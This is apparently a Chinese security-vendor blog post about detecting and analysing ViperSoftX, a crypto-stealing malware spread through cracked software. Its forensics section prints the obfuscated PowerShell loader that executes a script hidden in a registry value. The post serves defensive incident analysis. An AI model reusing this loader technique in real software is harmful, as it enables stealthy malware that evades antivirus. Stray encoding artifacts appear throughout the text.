聚銘網絡近期在一次對用戶的現(xiàn)場安全運維過程中,利用聚銘下一代智慧安全運營中心(AISOC)監(jiān)測到了若干惡意域名請求的異常行為����。經取證后發(fā)現(xiàn),該惡意軟件名為ViperSoftX���,具有多種混合惡意行為�。聚銘網絡相關產品報警如下:
圖1 惡意域名響應請求報警
圖2 惡意域名請求列表
經過查詢后�,可以看到此類域名已經被標注為惡意,下圖是其中一個域名的相關情報:
圖3 惡意域名情報信息
什么是ViperSoftX
ViperSoftX是一種信息竊取軟件���,主要功能為竊取加密貨幣�、剪貼板�,對受感染的機器進行指紋識別,以及下載和執(zhí)行任意附加的攻擊載荷或命令�����。ViperSoftX分發(fā)的一個有效載荷為特定的信息竊取器���,其形式是基于Chromium的瀏覽器擴展�����。該惡意擴展通過獲取受害者所訪問頁面的完全控制權限�,利用瀏覽器中間人攻擊(MITB)來篡改加密貨幣交易所上的API請求數(shù)據(jù)�,從而控制加密貨幣交易。
此外���,ViperSoftX還可以竊取受害者的剪貼板內容����,篡改訪問網站上的加密地址�,使用MQTT向C&C服務器報告事件等。ViperSoftX主要通過Adobe Illustrator��、Corel Video Studio��、Microsoft Office等破解軟件進行傳播�����。
ViperSoftX的攻擊鏈可以總結為以下流程:
圖4 ViperSoftX的攻擊鏈示意
取證過程
在了解了整個攻擊過程后��,通過聚銘下一代智慧安全運營中心(AISOC)的取證工具就可以比較輕松地掌握是哪個進程執(zhí)行了這些域名請求����。通過運行取證工具,可以明顯地看到一個Powershell腳本正在執(zhí)行��,如下圖所示:
圖5 腳本執(zhí)行命令截圖(通過取證工具獲?��。?/span>
可以看出����,這個PS腳本位于“C:\Windows\System32\”路徑下,打開它能看到如下內容:
$hWoZcYCHbzD=[ScriptBlock];$OYjdrEDOZG=[string];$QSIVJlVifNVF=[char]; icm ($hWoZcYCHbzD::Create($OYjdrEDOZG::Join('', ((gp 'HKLM:\SOFTWARE\Khronos8OjteuI').'1NpPEtPF' | % { [char]$_ }))))
很明顯���,這個PowerShell執(zhí)行的真正內容在“HKLM:\SOFTWARE\Khronos8OjteuI”中��,如下圖所示:
圖6 被植入在注冊表中的惡意程序腳本
可以看出受攻擊機器的注冊表信息已經被惡意修改�,通過解碼被寫入注冊表的內容后�,獲取到完整的惡意程序,其中關鍵部分如下:
圖7 請求惡意域名部分
這里使用了一個三重循環(huán)���,故最多可以變換出50個不同的域名(即2*5*5)���,以躲避相關安全設備的檢測,但由于其使用的還是有限的域名池�,因此在聚銘相關專業(yè)設備的幫助下能夠較為容易地偵測出來。
結論
聚銘網絡技術人員在現(xiàn)場取證的過程中了解到���,客戶被攻擊主機其實安裝了多種殺毒軟件�����,但在執(zhí)行查殺時沒有發(fā)現(xiàn)任何報警���,通過這一點可以充分說明ViperSoftX具有很強地隱蔽性(將其主要惡意部分放入了注冊表值)�����,一般的防護手段難以及時發(fā)現(xiàn)。
目前還未準確查明用戶是如何被植入ViperSoftX的����,但通過對其執(zhí)行鏈的分析,推測可能是用戶在上網時下載了包含惡意內容的軟件����,從而使主機受到感染。因此小銘哥提醒大家��,在上網時要切記網絡安全�,請勿下載盜版軟件,避免因一時疏忽成為黑客攻擊的受害者����。
